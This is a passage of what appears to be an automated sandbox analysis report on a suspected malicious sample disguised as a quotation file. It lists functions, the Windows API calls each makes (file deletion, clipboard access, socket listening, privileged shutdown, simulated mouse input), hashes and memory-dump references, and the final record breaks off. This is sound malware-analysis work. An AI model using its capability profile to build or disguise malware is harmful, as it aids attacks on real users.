                                                                            • Opcode ID: 2010c33f5821fcc6a1eff96e7c6f0efa42f2bfa4fac8c738358840392c3f2d20
                                                                            • Instruction ID: 3bedabb73069f2f6c006ece26724af19137115df8557319eeb143c9eb546d7b7
                                                                            • Opcode Fuzzy Hash: 2010c33f5821fcc6a1eff96e7c6f0efa42f2bfa4fac8c738358840392c3f2d20
                                                                            • Instruction Fuzzy Hash: 5F026EB16042009FD714DF28C895E6AB7E6EF89314F18849DF44ADB3A2DB31ED45CB91
                                                                            Function 006A8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLocalTime.KERNEL32(?), ref: 006A8257
                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 006A8267
                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 006A8273
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006A8310
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006A8324
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006A8356
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 006A838C
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006A8395
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectoryTime$File$Local$System
                                                                            • String ID: *.*
                                                                            • API String ID: 1464919966-438819550
                                                                            • Opcode ID: 689d92a18364b58ca84c54f96afa32d3e6aa7e5fabd29c9011568ac574852c16
                                                                            • Instruction ID: e3ab84d0803f6b6ec73c8aa29243d6e1850db16474780aca5fd8a06872946a08
                                                                            • Opcode Fuzzy Hash: 689d92a18364b58ca84c54f96afa32d3e6aa7e5fabd29c9011568ac574852c16
                                                                            • Instruction Fuzzy Hash: AF6159725043059FCB50EF60C8409AEB3EABF89320F04891EF98997251DB35ED45CF96
                                                                            Function 0069D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00633AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00633A97,?,?,00632E7F,?,?,?,00000000), ref: 00633AC2
                                                                              • Part of subcall function 0069E199: GetFileAttributesW.KERNEL32(?,0069CF95), ref: 0069E19A
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0069D122
                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0069D1DD
                                                                            • MoveFileW.KERNEL32(?,?), ref: 0069D1F0
                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 0069D20D
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0069D237
                                                                              • Part of subcall function 0069D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0069D21C,?,?), ref: 0069D2B2
                                                                            • FindClose.KERNEL32(00000000,?,?,?), ref: 0069D253
                                                                            • FindClose.KERNEL32(00000000), ref: 0069D264
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                            • String ID: \*.*
                                                                            • API String ID: 1946585618-1173974218
                                                                            • Opcode ID: d3b7903e259dc523381e73070c8edb802d1a99b308d37539880b6f5204296157
                                                                            • Instruction ID: cffd477c6c9714cee1300e8cb8c2b51b8f0f6652c937e18d271e564ecca89333
                                                                            • Opcode Fuzzy Hash: d3b7903e259dc523381e73070c8edb802d1a99b308d37539880b6f5204296157
                                                                            • Instruction Fuzzy Hash: DD617C31C0514DAACF45EBE0CA929FDB7BBAF55300F204069E40277291EB31AF09DBA4
                                                                            Function 006AED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                            • String ID:
                                                                            • API String ID: 1737998785-0
                                                                            • Opcode ID: da61da4cccb95e679cfcdff1371c314c9cac22162e6f76f4409679312cd695d4
                                                                            • Instruction ID: 312bc809b9f52f7a81027fb5d9e6d9818e4dce8bb762290469179648d76be5f9
                                                                            • Opcode Fuzzy Hash: da61da4cccb95e679cfcdff1371c314c9cac22162e6f76f4409679312cd695d4
                                                                            • Instruction Fuzzy Hash: E0416A35604611AFE720EF15D888F69BBA6BF45329F14C09DE4198BB62C736ED42CF90
                                                                            Function 0069E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0069170D
                                                                              • Part of subcall function 006916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0069173A
                                                                              • Part of subcall function 006916C3: GetLastError.KERNEL32 ref: 0069174A
                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 0069E932
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                            • String ID: $ $@$SeShutdownPrivilege
                                                                            • API String ID: 2234035333-3163812486
                                                                            • Opcode ID: 96ae2261284b652a2e1db2f85b78cf8efb570c7a2222b29cc3ff8ac5433cf966
                                                                            • Instruction ID: 1abb52d0fd3351a7bc838bb6246296e64c2e228927882e539e35fe3b0fafc746
                                                                            • Opcode Fuzzy Hash: 96ae2261284b652a2e1db2f85b78cf8efb570c7a2222b29cc3ff8ac5433cf966
                                                                            • Instruction Fuzzy Hash: 5501F972B10211AFEF54A6B49C8AFFF726EA714761F150426FD03E26D1D9A25C4181E4
                                                                            Function 006B1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 006B1276
                                                                            • WSAGetLastError.WSOCK32 ref: 006B1283
                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 006B12BA
                                                                            • WSAGetLastError.WSOCK32 ref: 006B12C5
                                                                            • closesocket.WSOCK32(00000000), ref: 006B12F4
                                                                            • listen.WSOCK32(00000000,00000005), ref: 006B1303
                                                                            • WSAGetLastError.WSOCK32 ref: 006B130D
                                                                            • closesocket.WSOCK32(00000000), ref: 006B133C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$closesocket$bindlistensocket
                                                                            • String ID:
                                                                            • API String ID: 540024437-0
                                                                            • Opcode ID: 1d305198cf80cab5bb669857d9afff877ed5a4c2c8a11005ccbbc8a4a9c62a15
                                                                            • Instruction ID: 809eb53e7818f17e62ef87006ab4d8a2561e98b45a7417f829997a6eeee01f65
                                                                            • Opcode Fuzzy Hash: 1d305198cf80cab5bb669857d9afff877ed5a4c2c8a11005ccbbc8a4a9c62a15
                                                                            • Instruction Fuzzy Hash: CF416071600100AFD710DF64C498BAABBE6AF46324F588198E9569F396C771EDC1CBE1
                                                                            Function 0069D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00633AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00633A97,?,?,00632E7F,?,?,?,00000000), ref: 00633AC2
                                                                              • Part of subcall function 0069E199: GetFileAttributesW.KERNEL32(?,0069CF95), ref: 0069E19A
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0069D420
                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 0069D470
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0069D481
                                                                            • FindClose.KERNEL32(00000000), ref: 0069D498
                                                                            • FindClose.KERNEL32(00000000), ref: 0069D4A1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                            • String ID: \*.*
                                                                            • API String ID: 2649000838-1173974218
                                                                            • Opcode ID: f0b652929fb1cc182643ce8becf26460cdbe44f1d13eaeff3f79b985613956aa
                                                                            • Instruction ID: 80bb7f84c74e7706707749613ac310b28ab483730eb3b29cb74978ea8049637a
                                                                            • Opcode Fuzzy Hash: f0b652929fb1cc182643ce8becf26460cdbe44f1d13eaeff3f79b985613956aa
                                                                            • Instruction Fuzzy Hash: 233180710083859FC744EF64D8918AFB7EEAE91710F444E2DF4D593291EB30AA09DBA7
                                                                            Function 006B22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(?,?,00000000), ref: 006B22E8
                                                                              • Part of subcall function 006AE4EC: GetWindowRect.USER32(?,?), ref: 006AE504
                                                                            • GetDesktopWindow.USER32 ref: 006B2312
                                                                            • GetWindowRect.USER32(00000000), ref: 006B2319
                                                                            • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 006B2355
                                                                            • GetCursorPos.USER32(?), ref: 006B2381
                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 006B23DF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                            • String ID:
                                                                            • API String ID: 2387181109-0
                                                                            • Opcode ID: 6bcaf4193dd488c266be28b63a14ca1ec5a5b7f595fb436389a67f12da666cc0
                                                                            • Instruction ID: 498a445655595eaf14a3fdd775bc022719ae3624af83a598b68cd4ca1156ef50
                                                                            • Opcode Fuzzy Hash: 6bcaf4193dd488c266be28b63a14ca1ec5a5b7f595fb436389a67f12da666cc0
                                                                            • Instruction Fuzzy Hash: 5631A1B25043169BDB20DF54C849FABB7EAFF84314F00091DF58997191D735E949CB92
                                                                            Function 006A9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 006A9B78
                                                                            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 006A9C8B
                                                                              • Part of subcall function 006A3874: GetInputState.USER32 ref: 006A38CB
                                                                              • Part of subcall function 006A3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006A3966
                                                                            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 006A9BA8
                                                                            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 006A9C75
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                                            • String ID: *.*
                                                                            • API String ID: 1927845040-438819550
                                                                            • Opcode ID: afd864f4640f3e1e6ae201df5079059283a578104af4c25ffb3bc8e92b6ac5f0
                                                                            • Instruction ID: d3c607947e202a06e5e0e9d55eb8f05a310310185c4203731537a92115e8c609
                                                                            • Opcode Fuzzy Hash: afd864f4640f3e1e6ae201df5079059283a578104af4c25ffb3bc8e92b6ac5f0
                                                                            • Instruction Fuzzy Hash: EC4183719046199FDF54EFA4CC49AEE7BB6EF06310F244159F805A2291DB309E44CFB4
                                                                            Function 0064997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00649BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00649BB2
                                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 00649A4E
                                                                            • GetSysColor.USER32(0000000F), ref: 00649B23
                                                                            • SetBkColor.GDI32(?,00000000), ref: 00649B36
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Color$LongProcWindow
                                                                            • String ID:
                                                                            • API String ID: 3131106179-0
                                                                            • Opcode ID: 2f9eca60250f6e0b61c166e7f048b310a09d689afcfa5e5a17cf4e07e08e039a
                                                                            • Instruction ID: 24e3f4d327f549f0fd39a5e12553b35da3616382968f5770b3b40d3065df0a5d
                                                                            • Opcode Fuzzy Hash: 2f9eca60250f6e0b61c166e7f048b310a09d689afcfa5e5a17cf4e07e08e039a
                                                                            • Instruction Fuzzy Hash: 38A1F970148454EEE729BA3C8C98EFB269FDB42350B25431DF502D6791CA25DD82D37A
                                                                            Function 006B1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006B304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 006B307A
                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 006B185D
                                                                            • WSAGetLastError.WSOCK32 ref: 006B1884
                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 006B18DB
                                                                            • WSAGetLastError.WSOCK32 ref: 006B18E6
                                                                            • closesocket.WSOCK32(00000000), ref: 006B1915
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 99427753-0
                                                                            • Opcode ID: 4e6ddc8a55cc769b6217d4504be770913bd70b1da6f7af6dd59b133babecaa94
                                                                            • Instruction ID: 5bf0a981ec8374f364c828c039c6e6904e434e897f45a7e1fd092e3f4eb69a54
                                                                            • Opcode Fuzzy Hash: 4e6ddc8a55cc769b6217d4504be770913bd70b1da6f7af6dd59b133babecaa94
                                                                            • Instruction Fuzzy Hash: 7251B3B5A00210AFEB10AF24C896F6A77E6AB45718F44805CFA155F3D3C771AD418BE1
                                                                            Function 006C1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                            • String ID:
                                                                            • API String ID: 292994002-0
                                                                            • Opcode ID: a393527ab7541bc84978caf479f603c267599bf011da8aba54b2092e40bcae1b
                                                                            • Instruction ID: 81039819e2883413d5a93af0d1fd3496435df8c3d38eb418cf00b3b563380fd9
                                                                            • Opcode Fuzzy Hash: a393527ab7541bc84978caf479f603c267599bf011da8aba54b2092e40bcae1b
                                                                            • Instruction Fuzzy Hash: 8A219E317402115FD7208F1AC894F7A7BA6EF87325F19805DE84A8B352C775E842CB94
                                                                            Function 00638060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                            • API String ID: 0-1546025612
                                                                            • Opcode ID: 1ed75ecd617b965c64ed870610674b7f6f3edcf0e18f2b78c5756b04cc6b29b9
                                                                            • Instruction ID: 3c68d5a388ef493b581bc8be30426707f2e487582b2615c42c75ec73a978df27
                                                                            • Opcode Fuzzy Hash: 1ed75ecd617b965c64ed870610674b7f6f3edcf0e18f2b78c5756b04cc6b29b9
                                                                            • Instruction Fuzzy Hash: A8A23C71A0061ACFDF24CF58C9517EEB7B3BB54314F2481A9E81AA7385DB749E81CB90
                                                                            Function 006A648E Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 367comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 006A6639
                                                                            • CoCreateInstance.OLE32(006CFCF8,00000000,00000001,006CFB68,?), ref: 006A6650
                                                                            • CoUninitialize.OLE32 ref: 006A68D4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CreateInitializeInstanceUninitialize
                                                                            • String ID: .lnk
                                                                            • API String ID: 948891078-24824748
                                                                            • Opcode ID: e19874776948962a1ccb237f2b81b081b735561f11c1964f0abeb01371c0d9dc
                                                                            • Instruction ID: 840df65eca232902ba1fc3673c4cf2fe1863c3c4b5e0944315809551cc1ce56f
                                                                            • Opcode Fuzzy Hash: e19874776948962a1ccb237f2b81b081b735561f11c1964f0abeb01371c0d9dc
                                                                            • Instruction Fuzzy Hash: 69D13971508201AFD354EF24C881E6BB7EAFF95704F04496DF5958B2A1EB70ED05CBA2
                                                                            Function 00698298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 006982AA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen
                                                                            • String ID: ($tbo$|
                                                                            • API String ID: 1659193697-2343487118
                                                                            • Opcode ID: 56233a1eb2dd7aa542b5a09f6496708f87c74d20f6fddb71ef057c36d493009a
                                                                            • Instruction ID: d62a8c293d8f25472e71f9e1059721989b243b8a5a3c914988c2d6c695239da8
                                                                            • Opcode Fuzzy Hash: 56233a1eb2dd7aa542b5a09f6496708f87c74d20f6fddb71ef057c36d493009a
                                                                            • Instruction Fuzzy Hash: 49324474A007059FCB28CF59C481AAAB7F5FF48710B15C46EE49ADB7A1EB70E941CB44
                                                                            Function 0066E4FF Relevance: 6.4, Strings: 4, Instructions: 1381COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
